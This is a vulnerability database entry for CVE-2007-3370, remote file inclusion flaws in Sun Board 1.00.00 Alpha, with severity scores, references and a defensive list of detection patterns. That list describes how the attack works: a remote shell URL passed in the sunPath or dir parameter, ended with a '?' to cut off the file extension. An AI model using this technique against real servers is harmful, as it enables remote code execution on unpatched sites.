CVE-2007-3370
published 2007-06-22CVE-2007-3370: Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
74.53%
99.4th percentile
Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath parameter to include.php or (2) the dir parameter to skin/board/default/doctype.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kim_kyoung_min | sun_board | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting /include.php with a user-supplied `sunPath` parameter containing a remote URL (e.g., http:// or ftp://) — classic RFI pattern used to load a remote shell. ↗
- →Monitor HTTP requests targeting /skin/board/default/doctype.php with a user-supplied `dir` parameter containing a remote URL — second RFI vector in Sun Board 1.00.00 Alpha. ↗
- →The exploit appends a null-terminating `?` after the remote file URL (e.g., Shell.txt?) to truncate the appended PHP extension — detect query strings in `sunPath` or `dir` parameters that end with `?` or contain remote URLs. ↗
- →The vulnerable code directly passes the `sunPath` parameter into a `require` statement without sanitization — look for PHP `require`/`require_once` calls using unsanitized GET/POST parameters in Sun Board installations. ↗
- ·The RFI vulnerability is only exploitable if PHP's `allow_url_include` (or `allow_url_fopen`) directive is enabled on the target server, which is required for remote file inclusion via `require`/`require_once`. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/36281http://osvdb.org/36282http://www.securityfocus.com/bid/24588http://www.vupen.com/english/advisories/2007/2307https://exchange.xforce.ibmcloud.com/vulnerabilities/35006https://www.exploit-db.com/exploits/4091http://osvdb.org/36281http://osvdb.org/36282http://www.securityfocus.com/bid/24588http://www.vupen.com/english/advisories/2007/2307https://exchange.xforce.ibmcloud.com/vulnerabilities/35006https://www.exploit-db.com/exploits/4091
2007-06-22
Published